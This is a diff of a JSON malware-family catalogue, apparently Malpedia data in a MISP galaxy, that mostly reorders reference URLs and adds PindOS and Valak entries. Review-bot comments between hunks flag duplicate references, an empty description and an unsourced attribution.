+ "https://github.com/Zenexer/lnkr/blob/master/recon/extensions/fanagokoaogopceablgmpndejhedkjjb/README.md"
 ],
 "synonyms": [],
 "type": []
@@ -8177,65 +8539,65 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart", + "https://go.recordedfuture.com/hubfs/reports/cta-2022-0719.pdf", + "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/", + "https://community.riskiq.com/article/2efc2782", + "https://www.riskiq.com/blog/labs/magecart-group-12-olympics/", + "https://blog.sucuri.net/2021/07/magecart-swiper-uses-unorthodox-concatenation.html", + "https://community.riskiq.com/article/5bea32aa", + "https://twitter.com/AffableKraut/status/1385030485676544001", + "https://www.riskiq.com/blog/labs/magecart-medialand/", "https://maxkersten.nl/2020/02/24/closing-in-on-magecart-12/", + "https://community.riskiq.com/article/fda1f967", + "https://sansec.io/research/magento-2-persistent-parasite", + "https://www.riskiq.com/blog/labs/misconfigured-s3-buckets/", + "https://www.riskiq.com/blog/labs/magecart-nutribullet/", + "https://sansec.io/research/magecart-corona-lockdown", "https://marcoramilli.com/2020/02/19/uncovering-new-magecart-implant-attacking-ecommerce/", "https://www.crowdstrike.com/blog/threat-actor-magecart-coming-to-an-ecommerce-store-near-you/", - "https://maxkersten.nl/2020/02/17/following-the-tracks-of-magecart-12/", - "https://scotthelme.co.uk/introducing-script-watch-detect-magecart-style-attacks-fast/?utm_source=dlvr.it&utm_medium=twitter", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/injecting-magecart-into-magento-global-config/", - "https://sansec.io/research/magecart-corona-lockdown", - "https://community.riskiq.com/article/30f22a00", - "https://blog.malwarebytes.com/threat-analysis/2020/06/web-skimmer-hides-within-exif-metadata-exfiltrates-credit-cards-via-image-files/", - "https://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/", - "https://www.perimeterx.com/blog/analyzing_magecart_malware_from_zero_to_hero/", - "https://www.reflectiz.com/the-gocgle-web-skimming-campaign/", - 
"https://www.riskiq.com/blog/labs/magecart-group-4-always-advancing/", - "https://www.riskiq.com/blog/labs/misconfigured-s3-buckets/", + "https://www.zscaler.com/blogs/security-research/black-friday-scams-4-emerging-skimming-attacks-watch-holiday-season", + "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", + "https://blog.sucuri.net/2020/07/skimmers-in-images-github-repos.html", + "https://blog.malwarebytes.com/cybercrime/2019/04/github-hosted-magecart-skimmer-used-against-hundreds-of-e-commerce-sites/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/magecart-skimming-attack-targets-mobile-users-of-hotel-chain-booking-websites/", + "https://sansec.io/labs/2020/01/25/magecart-hackers-arrested/", + "https://community.riskiq.com/article/017cf2e6", + "https://blog.malwarebytes.com/cybercrime/2021/05/newly-observed-php-based-skimmer-shows-ongoing-magecart-group-12-activity/", "https://blog.malwarebytes.com/cybercrime/2021/06/lil-skimmer-the-magecart-impersonator/", - "https://community.riskiq.com/article/743ea75b/description", + "https://blog.malwarebytes.com/threat-analysis/2020/06/web-skimmer-hides-within-exif-metadata-exfiltrates-credit-cards-via-image-files/", + "https://medium.com/reflectiz/csp-the-right-solution-for-the-web-skimming-pandemic-acb7a4414218", + "https://www.reflectiz.com/ico-fines-ticketmaster-uk-1-25-million-for-security-failures-a-lesson-to-be-learned/", + "https://blog.malwarebytes.com/threat-intelligence/2021/09/the-many-tentacles-of-magecart-group-8/", + "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", + "https://maxkersten.nl/2020/02/17/following-the-tracks-of-magecart-12/", + "https://www.riskiq.com/blog/labs/magecart-group-4-always-advancing/", + "https://www.zdnet.com/article/web-skimmers-found-on-the-websites-of-intersport-claires-and-icing/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + 
"https://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/us-local-government-services-targeted-by-new-magecart-credit-card-skimming-attack/", + "https://community.riskiq.com/article/30f22a00", + "https://maxkersten.nl/2020/01/20/ticket-resellers-infected-with-a-credit-card-skimmer/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/mirrorthief-group-uses-magecart-skimming-attack-to-hit-hundreds-of-campus-online-stores-in-us-and-canada/", + "https://twitter.com/MBThreatIntel/status/1416101496022724609", + "https://blog.malwarebytes.com/threat-intelligence/2021/10/q-logger-skimmer-keeps-magecart-attacks-going/", + "https://twitter.com/AffableKraut/status/1415425132080816133?s=20", + "https://geminiadvisory.io/magecart-google-tag-manager/", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://www.goggleheadedhacker.com/blog/post/14", "https://blog.trendmicro.com/trendlabs-security-intelligence/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops/", "https://geminiadvisory.io/wp-content/uploads/2020/07/Appendix-C-1.pdf", - "https://geminiadvisory.io/keeper-magecart-group-infects-570-sites/", - "https://community.riskiq.com/article/2efc2782", - "https://go.recordedfuture.com/hubfs/reports/cta-2022-0719.pdf", - "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", - "https://www.zdnet.com/article/web-skimmers-found-on-the-websites-of-intersport-claires-and-icing/", - "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/", - "https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html", - "https://blog.malwarebytes.com/threat-intelligence/2021/09/the-many-tentacles-of-magecart-group-8/", - "https://blog.malwarebytes.com/threat-intelligence/2021/10/q-logger-skimmer-keeps-magecart-attacks-going/", - 
"https://twitter.com/MBThreatIntel/status/1416101496022724609", - "https://community.riskiq.com/article/017cf2e6", - "https://community.riskiq.com/article/5bea32aa", - "https://www.goggleheadedhacker.com/blog/post/14", - "https://www.reflectiz.com/ico-fines-ticketmaster-uk-1-25-million-for-security-failures-a-lesson-to-be-learned/", - "https://www.zscaler.com/blogs/security-research/black-friday-scams-4-emerging-skimming-attacks-watch-holiday-season", - "https://blog.trendmicro.com/trendlabs-security-intelligence/us-local-government-services-targeted-by-new-magecart-credit-card-skimming-attack/", - "https://www.riskiq.com/blog/labs/magecart-nutribullet/", - "https://www.riskiq.com/blog/labs/magecart-group-12-olympics/", - "https://twitter.com/AffableKraut/status/1385030485676544001", - "https://sansec.io/research/magento-2-persistent-parasite", - "https://blog.trendmicro.com/trendlabs-security-intelligence/mirrorthief-group-uses-magecart-skimming-attack-to-hit-hundreds-of-campus-online-stores-in-us-and-canada/", - "https://community.riskiq.com/article/14924d61", - "https://blog.sucuri.net/2021/07/magecart-swiper-uses-unorthodox-concatenation.html", - "https://medium.com/reflectiz/csp-the-right-solution-for-the-web-skimming-pandemic-acb7a4414218", - "https://sansec.io/labs/2020/01/25/magecart-hackers-arrested/", - "https://maxkersten.nl/2020/01/20/ticket-resellers-infected-with-a-credit-card-skimmer/", - "https://securelist.com/apt-trends-report-q2-2019/91897/", - "https://blog.sucuri.net/2020/07/skimmers-in-images-github-repos.html", - "https://community.riskiq.com/article/fda1f967", - "https://sansec.io/research/north-korea-magecart", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://blog.malwarebytes.com/cybercrime/2019/04/github-hosted-magecart-skimmer-used-against-hundreds-of-e-commerce-sites/", - "https://blog.malwarebytes.com/threat-intelligence/2021/11/credit-card-skimmer-evades-virtual-machines/", + 
"https://scotthelme.co.uk/introducing-script-watch-detect-magecart-style-attacks-fast/?utm_source=dlvr.it&utm_medium=twitter", "https://blog.sucuri.net/2020/06/evasion-tactics-in-hybrid-credit-card-skimmers.html", - "https://geminiadvisory.io/magecart-google-tag-manager/", - "https://www.riskiq.com/blog/labs/magecart-medialand/", + "https://blog.malwarebytes.com/threat-intelligence/2021/11/credit-card-skimmer-evades-virtual-machines/", + "https://geminiadvisory.io/keeper-magecart-group-infects-570-sites/", + "https://community.riskiq.com/article/14924d61", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/injecting-magecart-into-magento-global-config/", "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", - "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", - "https://blog.trendmicro.com/trendlabs-security-intelligence/magecart-skimming-attack-targets-mobile-users-of-hotel-chain-booking-websites/", - "https://blog.malwarebytes.com/cybercrime/2021/05/newly-observed-php-based-skimmer-shows-ongoing-magecart-group-12-activity/", - "https://twitter.com/AffableKraut/status/1415425132080816133?s=20" + "https://community.riskiq.com/article/743ea75b/description", + "https://www.reflectiz.com/the-gocgle-web-skimming-campaign/", + "https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html", + "https://www.perimeterx.com/blog/analyzing_magecart_malware_from_zero_to_hero/", + "https://sansec.io/research/north-korea-magecart" ], "synonyms": [], "type": [] 
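Review bot: Nearly every line in this hunk is a reorder of refs the Magecart entry already had rather than new content, which makes any genuine addition hard to pick out, and the same shuffle appears in the neighbouring kopiluwak, lnkr and more_eggs hunks. That pattern suggests the refs array is emitted in API or hash order rather than sorted; emitting it deterministically in whatever produces this file (for example `sorted(refs)` with the Malpedia URL kept first) would keep future diffs down to real changes. JSON consumers do not care about array order here, but reviewers and `git blame` do.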
@@ -8261,33 +8623,33 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.more_eggs", - "https://sec0wn.blogspot.com/2023/03/how-do-you-like-dem-eggs-i-like-mine.html?m=1", - "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf", - "https://www.esentire.com/blog/hackers-spearphish-corporate-hiring-managers-with-poisoned-resumes-infecting-them-with-the-more-eggs-malware", - "https://www.secureworks.com/research/threat-profiles/gold-kingswood", - "http://www.secureworks.com/research/threat-profiles/gold-kingswood", - "https://www.esentire.com/web-native-pages/unmasking-venom-spider", - "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", - "https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/", - "https://twitter.com/Arkbird_SOLG/status/1301536930069278727", - "https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw", - "https://attack.mitre.org/software/S0284/", - "https://www.proofpoint.com/us/threat-insight/post/fake-jobs-campaigns-delivering-moreeggs-backdoor-fake-job-offers", - "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/", - "https://asert.arbornetworks.com/double-the-infection-double-the-fun/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://github.com/eset/malware-ioc/tree/master/evilnum", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/", - "https://blog.morphisec.com/cobalt-gang-2.0", - 
"https://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/", - "https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/", "https://expel.com/blog/more-eggs-and-some-linkedin-resume-spearphishing", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://sec0wn.blogspot.com/2023/03/how-do-you-like-dem-eggs-i-like-mine.html?m=1", + "https://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/", + "https://www.secureworks.com/research/threat-profiles/gold-kingswood", "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", - "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish", "https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire", - "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/" + "https://www.proofpoint.com/us/threat-insight/post/fake-jobs-campaigns-delivering-moreeggs-backdoor-fake-job-offers", + "https://blog.morphisec.com/cobalt-gang-2.0", + "https://www.esentire.com/web-native-pages/unmasking-venom-spider", + "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/", + "https://github.com/eset/malware-ioc/tree/master/evilnum", + "https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/", + "https://asert.arbornetworks.com/double-the-infection-double-the-fun/", + "https://twitter.com/Arkbird_SOLG/status/1301536930069278727", + "http://www.secureworks.com/research/threat-profiles/gold-kingswood", + 
"https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/", + "https://attack.mitre.org/software/S0284/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/", + "https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw", + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf", + "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish", + "https://www.esentire.com/blog/hackers-spearphish-corporate-hiring-managers-with-poisoned-resumes-infecting-them-with-the-more-eggs-malware", + "https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/" ], "synonyms": [ "SKID", @@ -8303,10 +8665,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.nanhaishu", - "https://attack.mitre.org/software/S0228/", - "https://community.spiceworks.com/topic/1028936-stealthy-cyberespionage-campaign-attacks-with-social-engineering", "https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf", - "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets" + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://attack.mitre.org/software/S0228/", + "https://community.spiceworks.com/topic/1028936-stealthy-cyberespionage-campaign-attacks-with-social-engineering" ], "synonyms": [], "type": [] 
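Review bot: The more_eggs refs list the Secureworks GOLD KINGSWOOD profile twice, once as `http://www.secureworks.com/research/threat-profiles/gold-kingswood` and once as the `https://` form, and this hunk only moves them. Drop the plain-http duplicate: it adds no information, and if anything fetches refs automatically the unencrypted URL is the one that can be altered in transit. The duplicate most likely originates upstream, so the dedupe ideally lives in the generator rather than in a hand edit here.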
@@ -8319,9 +8681,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.node_rat", - "https://blogs.jpcert.or.jp/ja/2019/02/tick-activity.html", + "https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf", - "https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/" + "https://blogs.jpcert.or.jp/ja/2019/02/tick-activity.html" ], "synonyms": [], "type": [] 
@@ -8330,19 +8692,19 @@ "value": "NodeRAT" }, { - "description": "Ostap is a commodity JScript downloader first seen in campaigns in 2016. It has been observed being delivered in ACE archives and VBA macro-enabled Microsoft Office documents. Recent versions of Ostap query WMI to check for a blacklist of running processes:\r\n\r\nAgentSimulator.exe\r\nanti-virus.EXE\r\nBehaviorDumper\r\nBennyDB.exe\r\nctfmon.exe\r\nfakepos_bin\r\nFrzState2k\r\ngemu-ga.exe (Possible misspelling of Qemu hypervisor’s guest agent, qemu-ga.exe)\r\nImmunityDebugger.exe\r\nKMS Server Service.exe\r\nProcessHacker\r\nprocexp\r\nProxifier.exe\r\npython\r\ntcpdump\r\nVBoxService\r\nVBoxTray.exe\r\nVmRemoteGuest\r\nvmtoolsd\r\nVMware2B.exe\r\nVzService.exe\r\nwinace\r\nWireshark\r\n\r\nIf a blacklisted process is found, the malware terminates.\r\n\r\nOstap has been observed delivering other malware families, including Nymaim, Backswap and TrickBot.", + "description": "Ostap is a commodity JScript downloader first seen in campaigns in 2016. It has been observed being delivered in ACE archives and VBA macro-enabled Microsoft Office documents. 
Recent versions of Ostap query WMI to check for a blacklist of running processes:\r\n\r\nAgentSimulator.exe\r\nanti-virus.EXE\r\nBehaviorDumper\r\nBennyDB.exe\r\nctfmon.exe\r\nfakepos_bin\r\nFrzState2k\r\ngemu-ga.exe (Possible misspelling of Qemu hypervisor\u2019s guest agent, qemu-ga.exe)\r\nImmunityDebugger.exe\r\nKMS Server Service.exe\r\nProcessHacker\r\nprocexp\r\nProxifier.exe\r\npython\r\ntcpdump\r\nVBoxService\r\nVBoxTray.exe\r\nVmRemoteGuest\r\nvmtoolsd\r\nVMware2B.exe\r\nVzService.exe\r\nwinace\r\nWireshark\r\n\r\nIf a blacklisted process is found, the malware terminates.\r\n\r\nOstap has been observed delivering other malware families, including Nymaim, Backswap and TrickBot.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.ostap", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", + "https://malfind.com/index.php/2021/11/24/from-the-archive-1-ostap-dropper-deobfuscation-and-analysis/", + "https://www.intrinsec.com/deobfuscating-hunting-ostap/", + "https://www.bromium.com/deobfuscating-ostap-trickbots-javascript-downloader/", "https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/", "https://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/", - "https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/deobfuscate_ostap.py", "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", - "https://www.intrinsec.com/deobfuscating-hunting-ostap/", - "https://malfind.com/index.php/2021/11/24/from-the-archive-1-ostap-dropper-deobfuscation-and-analysis/", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", - "https://www.bromium.com/deobfuscating-ostap-trickbots-javascript-downloader/", - 
"https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/" + "https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/deobfuscate_ostap.py", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf" ], "synonyms": [], "type": [] @@ -8368,9 +8730,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.peacenotwar", - "https://www.vice.com/en/article/dypeek/open-source-sabotage-node-ipc-wipe-russia-belraus-computers", "https://www.bleepingcomputer.com/news/security/big-sabotage-famous-npm-package-deletes-files-to-protest-ukraine-war/", - "https://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c" + "https://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c", + "https://www.vice.com/en/article/dypeek/open-source-sabotage-node-ipc-wipe-russia-belraus-computers" ], "synonyms": [], "type": [] @@ -8378,6 +8740,19 @@ "uuid": "6c304481-024e-4f34-af06-6235edacfdcc", "value": "PeaceNotWar" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.pindos", + "https://www.deepinstinct.com/blog/pindos-new-javascript-dropper-delivering-bumblebee-and-icedid" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6af1eb7a-bc54-43af-9e15-7187a5f250c4", + "value": "PindOS" + }, { "description": "", "meta": { @@ -8396,8 +8771,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.qnodeservice", - "https://blog.trendmicro.com/trendlabs-security-intelligence/qnodeservice-node-js-trojan-spread-via-covid-19-lure/", - "https://www.telsy.com/wp-content/uploads/MAR_93433_WHITE.pdf" + "https://www.telsy.com/wp-content/uploads/MAR_93433_WHITE.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/qnodeservice-node-js-trojan-spread-via-covid-19-lure/" ], "synonyms": [], "type": [] 
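Review bot: The new PindOS entry ships with `"description": ""`, so anyone tagging with this cluster gets no context for it, even though the only non-Malpedia ref's slug (`pindos-new-javascript-dropper-delivering-bumblebee-and-icedid`) already supports a one-line summary. Suggest `"description": "PindOS is a JavaScript dropper reported by Deep Instinct as delivering Bumblebee and IcedID."`, worded as reported because the slug is all this hunk shows. The sibling entry directly below also has an empty description, so this is an existing pattern, but a new entry is the cheap place to avoid extending it.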
@@ -8423,13 +8798,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.scanbox", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/attacker-tracking-users-seeking-pakistani-passport/", - "https://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/", - "https://www.proofpoint.com/us/blog/threat-insight/chasing-currents-espionage-south-china-sea", - "https://www.alienvault.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks", "https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global", "http://resources.infosecinstitute.com/scanbox-framework/", - "https://www.secureworks.com/research/threat-profiles/bronze-mohawk" + "https://www.alienvault.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks", + "https://www.proofpoint.com/us/blog/threat-insight/chasing-currents-espionage-south-china-sea", + "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/attacker-tracking-users-seeking-pakistani-passport/", + "https://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/" ], "synonyms": [], "type": [] @@ -8442,9 +8817,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.sqlrat", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", "https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/", - "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf" + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf" ], "synonyms": [], "type": [] 
@@ -8483,9 +8858,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_ff_ext", + "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/", "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/", - "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/", - "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/" + "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/" ], "synonyms": [], "type": [] 
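Review bot: This hunk keeps both `https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/` and `https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/`, which by date and path appear to be the same article on two hosts. Keep one of them unless the two are known to differ; duplicate refs inflate the list without adding evidence for the entry.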
@@ -8572,20 +8947,21 @@ "value": "Unidentified JS 002" }, { - "description": "", + "description": "According to PCrisk, Valak is malicious software that downloads JScript files and executes them. What happens next depends on the actions performed by the executed JScript files. It is very likely that cyber criminals behind Valak attempt to use this malware to cause chain infections (i.e., using Valak to distribute other malware).\r\n\r\nResearch shows that Valak is distributed through spam campaigns, however, in some cases, it infiltrates systems when they are already infected with malicious program such as Ursnif (also known as Gozi).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.valak", + "https://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html", + "https://medium.com/@prsecurity_/casual-analysis-of-valak-c2-3497fdb79bf7", + "https://labs.sentinelone.com/valak-malware-and-the-connection-to-gozi-loader-confcrew/", + "https://blog.talosintelligence.com/2020/07/valak-emerges.html", + "https://twitter.com/malware_traffic/status/1207824548021886977", + "https://security-soup.net/analysis-of-valak-maldoc/", + "https://threatresearch.ext.hp.com/detecting-ta551-domains/", "https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/", "https://unit42.paloaltonetworks.com/atoms/monsterlibra/", - "https://threatresearch.ext.hp.com/detecting-ta551-domains/", - "https://medium.com/@prsecurity_/casual-analysis-of-valak-c2-3497fdb79bf7", "https://www.cybereason.com/blog/valak-more-than-meets-the-eye", - "https://unit42.paloaltonetworks.com/valak-evolution/", - "https://blog.talosintelligence.com/2020/07/valak-emerges.html", - "https://security-soup.net/analysis-of-valak-maldoc/", - "https://labs.sentinelone.com/valak-malware-and-the-connection-to-gozi-loader-confcrew/", - "https://twitter.com/malware_traffic/status/1207824548021886977" + "https://unit42.paloaltonetworks.com/valak-evolution/" ], 
"synonyms": [ "Valek" @@ -8613,10 +8989,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jsp.godzilla_webshell", - "https://blog.gigamon.com/2022/09/28/investigating-web-shells/", - "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", + "https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/", "https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/", - "https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/" + "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", + "https://blog.gigamon.com/2022/09/28/investigating-web-shells/" ], "synonyms": [], "type": [] @@ -8643,6 +9019,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.amos", + "https://denshiyurei.medium.com/silent-echoes-the-hidden-dialogue-among-malware-entities-spotlight-on-amos-infostealer-6d7cd70e3219", "https://blog.cyble.com/2023/04/26/threat-actor-selling-new-atomic-macos-amos-stealer-on-telegram/" ], "synonyms": [ 
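Review bot: The new Valak description opens with `According to PCrisk`, but no PCrisk URL appears in the entry's refs array, so the attribution cannot be checked from the record itself. Either add the PCrisk write-up to `refs` or attribute the text to one of the sources already listed; the SentinelOne ref title already covers the Gozi loader relationship the description relies on. The `Ursnif (also known as Gozi)` wording is fine, only the sourcing is unverifiable here.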
@@ -8658,28 +9035,30 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.applejeus", - "https://www.youtube.com/watch?v=1NkzTKkEM2k", - "https://securelist.com/apt-trends-report-q2-2020/97937/", - "https://blog.sekoia.io/the-dprk-delicate-sound-of-cyber/", - "https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56", - "https://objective-see.com/blog/blog_0x5F.html", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", - "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", - "https://objective-see.com/blog/blog_0x54.html", - "https://objective-see.com/blog/blog_0x49.html", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048d", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048g", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048b", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048c", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048f", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048a", - "https://us-cert.cisa.gov/ncas/alerts/aa21-048a", - "https://securelist.com/operation-applejeus-sequel/95596/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-north-korea-indictment", "https://securelist.com/operation-applejeus/87553/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048f", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e", + "https://objective-see.com/blog/blog_0x49.html", + "https://vblocalhost.com/uploads/VB2021-Park.pdf", + "https://securelist.com/operation-applejeus-sequel/95596/", + 
